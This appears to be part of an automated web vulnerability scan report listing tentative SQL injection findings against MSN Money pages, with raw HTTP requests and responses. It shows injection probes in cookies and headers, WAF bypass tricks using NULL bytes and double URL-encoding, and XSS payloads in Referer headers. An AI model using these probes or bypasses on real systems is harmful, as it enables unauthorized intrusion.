Last-Modified: Tue, 04 Jan 2011 02:40:29 GMT
Accept-Ranges: bytes
ETag: "80ccc6bfb8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:51 GMT
Content-Length: 753


(function($)
{$.extend({getQuoteDetailUrl:function(type,symbol,server)
{var url="/investments/stock-price?symbol=";if(type)
{switch(type.toUpperCase())
{case"PUTOPTION":url="/investments/trading
...[SNIP]...

1.37. http://redacted/inc/css/ww.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/css/ww.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc/css'/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/css''/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Content-Length: 10099
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title
...[SNIP]...

1.38. http://redacted/inc/css/ww.css [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/css/ww.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /inc/css/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:47 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/css/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Content-Length: 458
Content-Type: text/css
Last-Modified: Tue, 04 Jan 2011 02:38:39 GMT
Accept-Ranges: bytes
ETag: "9f373f7eb8abcb1:161bf"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:48 GMT
Connection: close

#wwFra{z-index:1000000;border:1px solid #666;line-height:1.33em;width:500px;display:none;position:absolute;font:10pt arial,sans-serif;color:#333}#wwTbl{width:100%}#wwTbl td{padding:.4em 1em;vertical-a
...[SNIP]...

1.39. http://redacted/inc/scr/ajaxquotes.js [Sample cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/ajaxquotes.js

Issue detail

The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /inc/scr/ajaxquotes.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69%00'; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:54:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/ajaxquotes.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69%00''; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:24 GMT
Accept-Ranges: bytes
ETag: "0228fe0b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:54:24 GMT
Content-Length: 10160


if(typeof(Msn)=="undefined")
{Msn={};}
if(typeof(Msn.Money)=="undefined")
{Msn.Money={};}
if(typeof(Msn.Money.Quote)=="undefined")
{Msn.Money.Quote={};}
Msn.Money.Quote.Enums={Zero:{AsIs:0,NA:
...[SNIP]...

1.40. http://redacted/inc/scr/userchoice.js [MC1 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/userchoice.js

Issue detail

The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:25 GMT
Content-Length: 600


function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.41. http://redacted/inc/scr/userchoice.js [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/userchoice.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:24 GMT
Content-Length: 600


function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.42. http://redacted/inc/scr/userchoice.js [__qca cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/userchoice.js

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610'; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:28 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610''; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:28 GMT
Content-Length: 600


function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.43. http://redacted/inc/scr/ww.js [mh cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/ww.js

Issue detail

The mh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the mh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/scr/ww.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT%2527; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 17:33:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/ww.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT%2527%2527; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:37:48 GMT
Accept-Ranges: bytes
ETag: "026d05fb8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:33:50 GMT
Content-Length: 10184


String.prototype.WWtrim=function()
{return this.replace(/(^\s*)|(\s*$)/g,"");}
String.prototype.WWpeek=function()
{(/([^,;]+)$/i).exec(this);return RegExp.$1;}
String.prototype.WWhighlight=funct
...[SNIP]...

1.44. http://redacted/investor/StockRating/srsmain.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srsmain.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/StockRating/srsmain.asp?1%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:55 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/StockRating/srsmain.asp?1%2527%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:55 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.45. http://redacted/investor/StockRating/srstopstocksresults.aspx [MUID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Connection: close
Date: Sun, 30 Jan 2011 02:15:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Content-Type: text/html

<html><body><h1>Server is too busy</h1></body></html>

Request 2

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
